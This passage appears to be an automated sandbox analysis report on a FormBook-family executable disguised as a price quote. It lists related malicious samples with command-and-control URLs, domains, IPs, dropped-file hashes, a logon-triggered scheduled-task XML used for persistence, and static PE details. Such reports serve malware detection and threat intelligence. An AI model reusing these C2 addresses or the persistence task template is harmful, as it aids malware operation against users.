	sOjxIU25DP.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.lasik-de-de-8808230.zone/ms14/?B2Mpk=f85PJD7hpN2lIn7P&QJB0xT=0MCVt3ro+Y2fULC7mglHTnfgc1Mr+oeAYZcaZJUD5Vdcg90q3P52QZV9uqsVct+gY69j
	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	www.fetch-a-estudia-y-trabaja.info/be53/?E4p=yK7OrObBKTGz0pPpQHDZ1Ug64ujsVcJjhTRwQrEw26qJt5FpmjfB1P4zEa5Vqv0dsIGr&qR=EPGpk
	PO_3534272.exe	Get hash	malicious	FormBook	Browse	www.cartoes-de-credito-intl.xyz/ma94/?YluPF=Nfu4Yjo0GJ7L&B4EpnPtH=Q5KBibr19B3I6oegC2kqCY753lf2c8+RB5cXpHvNhqyTW5c+d9/DFpYhHB874vyDgkKs
198.54.117.242	s6iTCm8Z41.exe	Get hash	malicious	FormBook	Browse	www.royalplywoods.com/m0u5/?Pzu09f=J7kpA46ijUpU6/O4oYKbwm6Xh+gaEL9cvzIjyXxoh1inRNvlGfbOsixSDEbkuuK5ebKl0wZ0+w==&QR-=ip04
	Enquiry_for_Quotation-png-.exe	Get hash	malicious	FormBook	Browse	www.makeitmakesensemedia.com/oi24/?Ddy8j=-ZsL0b&6lx=NkKkyJkgmPU8c4tKLfm/lQDBrsVE8Y12es6T106LYD12rxRIUhEjqVCEgbWtOGO+DeNyZ3v8Kw==
	Shipping_Documents.exe	Get hash	malicious	FormBook	Browse	www.artwaylogistics.com/ca82/?ZhrXPD=O0HRZ9uj6Vrh1ZjnGkFW16NY/Bly4Eat0O8HNzHZzSK46xrzdkWlEmW5pcweppcIw0mq9//u+g==&T6e=-Zsdq
	3BJu4JXXt3.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	4uinRSyJJk.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	GFxRoJf0q7.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	LnX1k6GL10.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	p4b7284861.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	1mLbhnhYM7.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	I2JCJblEdL.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	qJVkNUQ4Hx.exe	Get hash	malicious	IcedID	Browse	gintoonafa.com/
	Arrival Notice_6648122036.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.ccjls.online/ix1e/?pPD=QauRjw0wBGsfhOu+5/DBcsRKuImiFJLWzquX8D66tgOgTw1roINM44aX4iMoJPlZX+cW&S80hC=5jcLFtG
	dhl-009765.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.ectdamageoutlaytospe.xyz/dpau/?qibX4Gr=QZwybWoB/SpzQIBhe/UBadLeA6YRJkH5U1ocD0CZdFS6SWCuMFufzYF2feaZShzgPEvhywLFsFC8eN+mjjPPbQ8OhVM7l+336A==&lwQ4=vlZoY95lkO-fs_b
	Swift-Copy.exe	Get hash	malicious	FormBook	Browse	www.ectdamageoutlaytospe.xyz/erh1/?cqe4T4q8=AHcw5OXb/Gm0OTCfDv5yJ6SE0M1q9RKBtUxAFBdta5MKTtGQWXSjyWXZC60WHZ392olkMPrlwQK/2TLCtTIeByMqpdZlcKtCCblMrMphv1Uj&DiTize=UcS4
	Invoice25343.scr.exe	Get hash	malicious	FormBook	Browse	www.ectdamageoutlaytospe.xyz/erh1/?Tt=AHcw5OXb/Gm0OTCfDv5yJ6SE0M1q9RKBtUxAFBdta5MKTtGQWXSjyWXZC60WHZ392olkMPrlwQK/2TLCtTIJVjN1mPQPa5ZjPA==&Yo11Km=4dCveFH75Xk
	file.exe	Get hash	malicious	FormBook	Browse	www.surfexpk.com/io24/?zawTxC=lH0mag&9aq3lcgd=ss6zxCF/RUC1N8nNkjrKoW/1+8nzt8afzbuQ0wE/DrtjJUr+Uz47osBFe7dsvDVHm1CGKvvVRRTK6b9SIq06X4/emS/Wc26Dhw==
	z1Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nyomnirangearadio.xyz/ik4t/?a4XZg=KdQ0RaqTO/WIRKhjRZVLSCoEes4VA16G1+GT5j3E3LaLKGENy0i0SOCAhLoktPJLNi4zimd9KACFUdBnuH49JwBTQrRhL5RiKA==&OsSIN=8o3y2VncPJur74
	INQUIRY.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.summertimesagamod.com/ifkh/?gr1cx=6VJrASpkSneNdf4I/3E/IIW/Z05qSfBtajPHAiMHGvZspeAWzdvWl+CohKLSfQOq9RTwJOwF/nxv5FbaMhnkwuKvq2Z2O9IwGA==&WP=swm4NUz
	YIqZ253T62.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nyomnirangearadio.xyz/ik4t/?DQ=KdQ0RaqTO/WIRKhjRZVLSCoEes4VA16G1+GT5j3E3LaLKGENy0i0SOCAhLoktPJLNi4zimd9KACFUdBnuH49JwBTQrRhL5RiKA==&tf=UqhDJB_qkFeWgI
	file.exe	Get hash	malicious	FormBook	Browse	www.ectdamageoutlaytospe.xyz/erh1/?9-Q6pi=AHcw5OXb/Gm0OTCfDv5yJ6SE0M1q9RKBtUxAFBdta5MKTtGQWXSjyWXZC60WHZ392olkMPrlwQK/2TLCtTIJVhMppuQPZ5RrPA==&PYYgK=-YeR9mS

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ssl1.prod.systemdragon.com	wLlREXsA9M.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.157.1
	sOjxIU25DP.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.157.1
	hi38VYWujz.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.158.1
	Payment_document.docx.doc	Get hash	malicious	FormBook	Browse	104.17.158.1
	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.158.1
	PO_3534272.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
256.93cu.com	romankon2.1.exe	Get hash	malicious	FormBook, NSISDropper	Browse	154.12.93.8

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Pre-alert_docs.exe	Get hash	malicious	Lokibot	Browse	104.21.4.159
	TqR53LgfMt.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	172.67.216.26
	ACH-receipt.html	Get hash	malicious	HTMLPhisher	Browse	172.67.210.78
	ySAFW9TLdc.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, RedLine, SmokeLoader	Browse	172.67.34.170
	qg3dE4bMBI.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	104.20.67.143
	660361f776e3b878b6a925cccdfeccfd0d8152e4d98c6.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	104.20.67.143
	Updated_PI_&_BL_Draft.exe	Get hash	malicious	Lokibot	Browse	104.21.4.159
	http://mastermindset.net/k4f5	Get hash	malicious	HTMLPhisher	Browse	172.67.155.171
	saham.apk	Get hash	malicious	Irata	Browse	104.21.51.203
	saham.apk	Get hash	malicious	Irata	Browse	104.21.51.203
	https://gtusuceed.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	1nxmE8HMCd.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, RedLine, SmokeLoader	Browse	172.67.34.170
	RemittanceCopy 1912INVOICE Tuesday.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	dIGeFMaDQP.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, RedLine, SmokeLoader	Browse	104.20.68.143
	DO4AoiErfW.exe	Get hash	malicious	Amadey, Babadeda, CobaltStrike, Glupteba, RedLine, SmokeLoader	Browse	104.20.68.143
	https://partnersmarketingcurated.com/27021-201127/113666?uid=A7sQsfvQ7xSUkqscG8DjhPV1N53Lp2QPg1A&prom_type=regular&prom_id=229064&pld=26L81sNgpwNGbf&answer-1=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://a.342d.xyz/?s=p1697450461	Get hash	malicious	Unknown	Browse	104.21.51.42
	https://bafybeifd37p5hukvpemgyobsom4x7s7ceml2hbyfgxbhstw3tgtd4oqa3u.ipfs.cf-ipfs.com/GM.html#bla@bla.com	Get hash	malicious	Unknown	Browse	104.17.64.14
	https://pub-e155d29493854e57b8daf1867e6fc250.r2.dev/h1.html	Get hash	malicious	HTMLPhisher	Browse	172.67.139.58
	https://ldddfdder3.com/web/page/index.php	Get hash	malicious	Unknown	Browse	104.18.27.193
DNC-ASDimensionNetworkCommunicationLimitedHK	SecuriteInfo.com.HEUR.Trojan.Win32.Makoob.gen.19552.3875.exe	Get hash	malicious	FormBook, GuLoader	Browse	207.148.37.68
	ye55fIjypU.elf	Get hash	malicious	Mirai	Browse	66.233.199.79
	SecuriteInfo.com.HEUR.Trojan.Win32.Makoob.gen.25322.16227.exe	Get hash	malicious	FormBook, GuLoader	Browse	207.148.37.68
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook	Browse	103.195.50.210
	payment_62_mt103_03.10.2023_PDF.exe	Get hash	malicious	DBatLoader, FormBook	Browse	46.149.204.220
	MullvadVPN-2023.4.exe	Get hash	malicious	Agent Tesla, AgentTesla, FormBook	Browse	207.148.44.146
	borilpokonta2.1.exe	Get hash	malicious	FormBook, NSISDropper	Browse	69.160.175.90
	tzCuIASNQp.exe	Get hash	malicious	FormBook	Browse	66.203.148.118
	nOQTzd9ke3.elf	Get hash	malicious	Mirai	Browse	66.203.158.217
	pandora.x86.elf	Get hash	malicious	Mirai	Browse	66.233.78.240
	SecuriteInfo.com.W32.Formbook.AA.tr.15627.15839.exe	Get hash	malicious	DBatLoader, FormBook	Browse	207.148.37.68
	quPVzfZ7Pd.elf	Get hash	malicious	Mirai	Browse	66.233.199.68
	RioyxPDpHF.elf	Get hash	malicious	Mirai	Browse	66.233.199.82
	sora.arm.elf	Get hash	malicious	Mirai	Browse	66.233.31.205
	6K20nZhV6g.elf	Get hash	malicious	Mirai	Browse	66.203.158.216
	yeni_sipari#U015f_pdf.exe	Get hash	malicious	FormBook	Browse	66.203.155.60
	jKCoZc5Oll.elf	Get hash	malicious	Mirai	Browse	66.233.78.244
	Hesap_Hareketleri_10072023.exe	Get hash	malicious	FormBook, GuLoader	Browse	116.204.157.22
	Hesap_Hareketleri_10072023.exe	Get hash	malicious	FormBook, GuLoader	Browse	116.204.157.22
	HALKBANK.exe	Get hash	malicious	FormBook, GuLoader	Browse	116.204.157.22

Process:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ySqETqNvdTbE.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.19752173423261
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhmvmelb0O0bihmc5mel6CUXyhmdmelbxdB6hmCmelz0Jahm7melbNdL:YqHZ6T06McuIb0O0biccUIDUXycAIbx3
MD5:	B8F1026E2F105E444BC295DDE77C6D16
SHA1:	830D4EC90E5AE43B829544F48306DFF9633B0D1A
SHA-256:	CA99DE552553F6681A5F4B51FCFC0191BCE4EE8FC930C16FF2B95169E3B22F9A
SHA-512:	FD9506754FD7CE466C1B6887C942357FB368E03A6CF0FE81D143B657A86B3454CAF42F8CF2678B62E1FDC5CB93ABEA790AE3DE857F4486B8292DFB59951E7B7F
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1276605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1266605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":1256605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1246605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":1236605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1226605664,"LastSwitchedHighPart":31061866,

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
MD5:	C961E3496AA47D8AF3F9E184D4F78133
SHA1:	0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
SHA-256:	303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
SHA-512:	C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yqlf5wu.psl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5v4qnhsb.fmo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2nmyyj5.4if.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz23ptbr.y32.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp17EA.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1571
Entropy (8bit):	5.091075162566157
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewaQv:HeLwYrFdOFzOz6dKrsuqbO
MD5:	E2B3BBC003097644700206385757669A
SHA1:	04FECAE0F545A5460259A0D9DA9E40D628733FDF
SHA-256:	96ACA0EDC176DBDB271BE1B51007161FCB8DB06B5780C4F6D1827E3E67E89DDC
SHA-512:	84E8120EAFB47CBDD0E6ECABBF621A9D0171B75349E8479743333F788142CE232B30DA14CED5FE1C1E79584EDBF461DC015C2F617682E7C3037E843E746AD7EE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmpF7.tmp

Download File

Process:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1571
Entropy (8bit):	5.091075162566157
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewaQv:HeLwYrFdOFzOz6dKrsuqbO
MD5:	E2B3BBC003097644700206385757669A
SHA1:	04FECAE0F545A5460259A0D9DA9E40D628733FDF
SHA-256:	96ACA0EDC176DBDB271BE1B51007161FCB8DB06B5780C4F6D1827E3E67E89DDC
SHA-512:	84E8120EAFB47CBDD0E6ECABBF621A9D0171B75349E8479743333F788142CE232B30DA14CED5FE1C1E79584EDBF461DC015C2F617682E7C3037E843E746AD7EE
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Download File

Process:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	618496
Entropy (8bit):	7.90114036451823
Encrypted:	false
SSDEEP:	12288:VzfqB+9TPTn4j+sBqGAbf54AZ+W0AouwDjPUM4JiCtg2q:VT6+FEqsBEN4K+WjwpIg
MD5:	94C19A35210D356074C3CFAA1EA92350
SHA1:	C0EE6ED414E3A3A3B6C02EBB73DFCB761E276B3F
SHA-256:	F1F7DCF88E6CA4FA8165311D3920015410923574ED2F84DECEC634ADAB432063
SHA-512:	A0824111CB5CF4EB8F39A785189B66BE396C8261DEA9800DF12DD25E0ACA1F95DFFAFC44662C773C714FD981A95165AFA19D0D7C06DF26572CC51192DEA98DE6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.,e..............0..@... .......\... ...`....... ....................................@.................................Y\..O....`..x............................=..T............................................ ............... ..H............text....<... ...@.................. ..`.rsrc...x....`.......P..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.90114036451823
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
File size:	618'496 bytes
MD5:	94c19a35210d356074c3cfaa1ea92350
SHA1:	c0ee6ed414e3a3a3b6c02ebb73dfcb761e276b3f
SHA256:	f1f7dcf88e6ca4fa8165311d3920015410923574ed2f84decec634adab432063
SHA512:	a0824111cb5cf4eb8f39a785189b66be396c8261dea9800df12dd25e0aca1f95dffafc44662c773c714fd981a95165afa19d0d7c06df26572cc51192dea98de6
SSDEEP:	12288:VzfqB+9TPTn4j+sBqGAbf54AZ+W0AouwDjPUM4JiCtg2q:VT6+FEqsBEN4K+WjwpIg
TLSH:	99D4125433A4CB2EC47E5FFA8122E650C7F5780A6A75C61A1DC114DE0A7BFE48924FA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.,e..............0..@... .......\... ...`....... ....................................@................................

File Icon


Icon Hash:	3337333333339aa2

Static PE Info

General

Entrypoint:	0x11095cae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x11000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
